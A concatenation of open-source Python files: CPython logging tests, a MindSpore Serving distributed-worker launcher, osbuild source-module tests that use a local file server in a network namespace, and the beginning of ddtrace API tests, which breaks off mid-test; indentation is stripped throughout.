setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if False and hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
start_distributed_worker.py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Start distributed worker process"""
import os
import sys
import time
import threading
import psutil
import mindspore_serving.log as logger
from mindspore_serving.server import worker
from mindspore_serving.server.worker import distributed
from mindspore_serving.server.common import check_type
from mindspore_serving._mindspore_serving import ExitSignalHandle_
from mindspore_serving._mindspore_serving import Worker_
def start_listening_parent_thread(servable_name):
"""listening to parent process status"""
def worker_listening_parent_thread():
parent_process = psutil.Process(os.getppid())
while parent_process.is_running() and not ExitSignalHandle_.has_stopped():
time.sleep(0.1)
logger.warning(f"Distributed worker {servable_name}, detect parent "
f"pid={parent_process.pid} has exited or receive Ctrl+C message, worker begin to exit")
worker.stop()
thread = threading.Thread(target=worker_listening_parent_thread)
thread.start()
def start_worker(servable_directory, servable_name, version_number, rank_table_json_file,
distributed_address, wait_agents_time_in_seconds,
master_address, listening_master=False):
"""Start distributed worker process"""
check_type.check_str('servable_directory', servable_directory)
check_type.check_str('servable_name', servable_name)
check_type.check_int('version_number', version_number, 0)
check_type.check_str('rank_table_json_file', rank_table_json_file)
check_type.check_str('distributed_address', distributed_address)
check_type.check_int('wait_agents_time_in_seconds', wait_agents_time_in_seconds, 0)
check_type.check_str('master_address', master_address)
check_type.check_bool('listening_master', listening_master)
ExitSignalHandle_.start() # Set flag to running and receive Ctrl+C message
if listening_master:
start_listening_parent_thread(servable_name)
worker_pid = os.getpid()
unix_socket_dir = "unix_socket_files"
try:
os.mkdir(unix_socket_dir)
except FileExistsError:
pass
worker_address = f"unix:{unix_socket_dir}/serving_worker_{servable_name}_distributed_{worker_pid}"
try:
distributed.start_servable(servable_directory=servable_directory, servable_name=servable_name,
version_number=version_number, rank_table_json_file=rank_table_json_file,
distributed_address=distributed_address,
wait_agents_time_in_seconds=wait_agents_time_in_seconds,
master_address=master_address, worker_address=worker_address)
except RuntimeError as ex:
Worker_.notify_failed(master_address, f"{{distributed servable:{servable_name}, {ex}}}")
raise
def parse_args_and_start():
"""Parse args and start distributed worker"""
if len(sys.argv) != 9:
raise RuntimeError("Expect length of input argv to be 8: str{servable_directory} str{servable_name} "
"int{version_number} str{rank_table_json_file} str{distributed_address} "
"int{wait_agents_time_in_seconds} str{master_address} bool{listening_master}")
servable_directory = sys.argv[1]
servable_name = sys.argv[2]
version_number = int(sys.argv[3])
rank_table_json_file = sys.argv[4]
distributed_address = sys.argv[5]
wait_agents_time_in_seconds = int(sys.argv[6])
master_address = sys.argv[7]
# pylint: disable=simplifiable-if-expression
listening_master = True if sys.argv[8].lower() == "true" else False
start_worker(servable_directory, servable_name, version_number, rank_table_json_file, distributed_address,
wait_agents_time_in_seconds, master_address, listening_master)
if __name__ == '__main__':
parse_args_and_start()
|
test_sources.py
|
#
# Runtime Tests for Source Modules
#
import contextlib
import ctypes
import http.server
import json
import os
import socketserver
import subprocess
import tempfile
import threading
import pytest
import osbuild.objectstore
import osbuild.meta
import osbuild.sources
from osbuild import host
from .. import test
def errcheck(ret, _func, _args):
if ret == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
CLONE_NEWNET = 0x40000000
libc = ctypes.CDLL('libc.so.6', use_errno=True)
libc.setns.errcheck = errcheck
@contextlib.contextmanager
def netns():
# Grab a reference to the current namespace.
with open("/proc/self/ns/net") as oldnet:
# Create a new namespace and enter it.
libc.unshare(CLONE_NEWNET)
try:
# Up the loopback device in the new namespace.
subprocess.run(["ip", "link", "set", "up", "dev", "lo"], check=True)
yield
finally:
# Revert to the old namespace, dropping our
# reference to the new one.
libc.setns(oldnet.fileno(), CLONE_NEWNET)
@contextlib.contextmanager
def fileServer(directory):
with netns():
# This is leaked until the program exits, but inaccessible after the with
# due to the network namespace.
barrier = threading.Barrier(2)
thread = threading.Thread(target=runFileServer, args=(barrier, directory))
thread.daemon = True
thread.start()
barrier.wait()
yield
def can_setup_netns() -> bool:
try:
with netns():
return True
except: # pylint: disable=bare-except
return False
def runFileServer(barrier, directory):
class Handler(http.server.SimpleHTTPRequestHandler):
def __init__(self, request, client_address, server):
super().__init__(request, client_address, server, directory=directory)
httpd = socketserver.TCPServer(('', 80), Handler)
barrier.wait()
httpd.serve_forever()
def make_test_cases():
sources = os.path.join(test.TestBase.locate_test_data(), "sources")
if os.path.exists(sources):
for source in os.listdir(sources):
for case in os.listdir(f"{sources}/{source}/cases"):
yield source, case
def check_case(source, case, store, libdir):
with host.ServiceManager() as mgr:
expects = case["expects"]
if expects == "error":
with pytest.raises(host.RemoteError):
source.download(mgr, store, libdir)
elif expects == "success":
source.download(mgr, store, libdir)
else:
raise ValueError(f"invalid expectation: {expects}")
@pytest.fixture(name="tmpdir")
def tmpdir_fixture():
with tempfile.TemporaryDirectory() as tmp:
yield tmp
@pytest.mark.skipif(not can_setup_netns(), reason="network namespace setup failed")
@pytest.mark.parametrize("source,case", make_test_cases())
def test_sources(source, case, tmpdir):
index = osbuild.meta.Index(os.curdir)
sources = os.path.join(test.TestBase.locate_test_data(), "sources")
with open(f"{sources}/{source}/cases/{case}") as f:
case_options = json.load(f)
info = index.get_module_info("Source", source)
desc = case_options[source]
items = desc.get("items", {})
options = desc.get("options", {})
src = osbuild.sources.Source(info, items, options)
with osbuild.objectstore.ObjectStore(tmpdir) as store, \
fileServer(test.TestBase.locate_test_data()):
check_case(src, case_options, store, index.path)
check_case(src, case_options, store, index.path)
|
test_api.py
|
import mock
import re
import socket
import threading
import time
import warnings
from unittest import TestCase
import pytest
from ddtrace.api import API, Response
from ddtrace.compat import iteritems, httplib, PY3
from ddtrace.internal.runtime.container import CGroupInfo
from ddtrace.vendor.six.moves import BaseHTTPServer, socketserver
class _BaseHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
error_message_format = '%(message)s\n'
error_content_type = 'text/plain'
@staticmethod
def log_message(format, *args): # noqa: A002
pass
class _APIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
self.send_error(200, 'OK')
class _TimeoutAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
# This server sleeps longer than our timeout
time.sleep(5)
class _ResetAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
return
_HOST = '0.0.0.0'
_TIMEOUT_PORT = 8743
_RESET_PORT = _TIMEOUT_PORT + 1
class UDSHTTPServer(socketserver.UnixStreamServer, BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
def _make_uds_server(path, request_handler):
server = UDSHTTPServer(path, request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture
def endpoint_uds_server(tmp_path):
server, thread = _make_uds_server(str(tmp_path / 'uds_server_socket'), _APIEndpointRequestHandlerTest)
try:
yield server
finally:
server.shutdown()
thread.join()
def _make_server(port, request_handler):
server = BaseHTTPServer.HTTPServer((_HOST, port), request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture(scope='module')
def endpoint_test_timeout_server():
server, thread = _make_server(_TIMEOUT_PORT, _TimeoutAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture(scope='module')
def endpoint_test_reset_server():
server, thread = _make_server(_RESET_PORT, _ResetAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
class ResponseMock:
def __init__(self, content, status=200):
self.status = status
self.content = content
def read(self):
return self.content
def test_api_str():
api = API('localhost', 8126)
assert str(api) == 'localhost:8126'
api = API('localhost', 8126, '/path/to/uds')
assert str(api) == '/path/to/uds'
class APITests(TestCase):
def setUp(self):
# DEV: Mock here instead of in tests, before we have patched `httplib.HTTPConnection`
self.conn = mock.MagicMock(spec=httplib.HTTPConnection)
self.api = API('localhost', 8126)
def tearDown(self):
del self.api
del self.conn
def test_typecast_port(self):
api = API('localhost', u'8126')
self.assertEqual(api.port, 8126)
@mock.patch('logging.Logger.debug')
def test_parse_response_json(self, log):
test_cases = {
'OK': dict(
js=None,
log='Cannot parse Datadog Agent response, please make sure your Datadog Agent is up to date',
),
'OK\n': dict(
js=None,
log='Cannot parse Datadog Agent response, please make sure your Datadog Agent is up to date',
),
'error:unsupported-endpoint': dict(
